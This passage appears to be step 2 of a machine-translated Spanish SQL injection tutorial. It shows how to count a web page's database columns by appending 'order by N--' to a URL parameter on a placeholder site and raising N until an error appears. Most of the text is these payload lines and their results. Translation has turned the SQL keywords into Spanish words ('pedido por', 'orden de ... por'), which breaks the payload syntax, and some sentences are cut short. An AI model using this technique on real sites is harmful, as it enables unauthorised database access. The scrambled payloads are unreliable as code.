Paso 2: Calcular el número de columnas
Vamos a utilizar el comando ordenar por. Este comando le dice a la base de datos como ordenar el resultado.
Para utilizar este comando, eliminar las comillas (') que ha escrito antes y escriba en el comando ordenar por 1--
El sitio web será: http://Vulnerable.com/goodies.php?id=10 pedido por 1--
Ahora, seguir aumentando el número hasta que tengamos un error de
Consejo: Los "--" es un doble guión / menos símbolo
Aquí es cómo funciona]
orden de http://vulnerable.com/Goodies.php?id=10 por 1--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 2--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 3--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 4--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 5--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 6--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 7--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 8--< = no obtenemos ningún error
orden de http://vulnerable.com/Goodies.php?id=10 por 9--< = Bingo! Tenemos error "Desconocido columna '9' en la 'cláusula de orden'"
Tuvimos un error en la novena prueba. Así que hay 8 columnas.